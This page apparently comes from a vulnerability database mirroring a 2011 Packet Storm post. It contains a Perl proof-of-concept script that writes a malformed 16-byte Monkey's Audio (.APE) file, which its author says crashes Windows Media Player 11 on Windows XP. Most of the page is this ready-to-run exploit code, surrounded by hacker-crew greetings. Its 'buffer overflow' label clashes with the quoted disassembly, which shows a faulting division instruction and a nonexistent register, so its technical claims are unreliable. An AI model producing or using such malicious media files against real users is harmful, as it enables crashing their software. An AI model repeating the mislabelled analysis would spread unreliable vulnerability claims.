Lucene search
K

Windows Media Player 11.0 Buffer Overflow

🗓️ 27 Mar 2011 00:00:00Reported by KedAns-DzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Windows Media Player v11.0 Buffer Overflow in .APE file, impacting 'wmplayer.exe' process on Windows XP SP3 Françai

Code
`#!/usr/bin/perl  
  
###  
# Title : Windows Media Player v11.0 (.ape) Buffer Overflow  
# Author : KedAns-Dz  
# E-mail : [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# platform : Windows   
# Impact : Overflow in 'wmplayer.exe' Process  
# Tested on : Windows XP SP3 Français   
# Target : Windows Media Player v11.0  
###  
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )  
# ------------  
# Usage : 1 - Creat APE file ( Monkey's Audio Format )  
# => 2 - Open APE file With Windows Media Player v11.0  
# => 3 - OverFlow !!!  
# Assembly Error in [MonkeySource.ax] ! 022351a6() ! :  
# 0x022351a3 ,0xc2 0x08 0x00 [ret] || 8  
# 0x022351a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ")  
# 0x022351a8 ,0x31 0xd2 [xor] || edx,edx  
# 0x022351aa ,0xeb 0xf3 [jmp] || 0x0223519f  
# 0x022351ac ,0xc3 [ret] ||   
# ------------  
#START SYSTEM /root@MSdos/ :  
system("title KedAns-Dz");  
system("color 1e");  
system("cls");  
print "\n\n";   
print " |=======================================================|\n";  
print " |= [!] Name : Windows Media Player v11.0 || .APE File =|\n";  
print " |= [!] Exploit : Buffer Overflow Exploit =|\n";  
print " |= [!] Author : KedAns-Dz =|\n";  
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";  
print " |=======================================================|\n";  
sleep(2);  
print "\n";  
# Creating ...  
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header  
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB  
print file $PoC;   
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";  
close(file);   
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >  
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz  
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz  
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)  
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{  
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX   
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,  
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com   
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...  
#================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation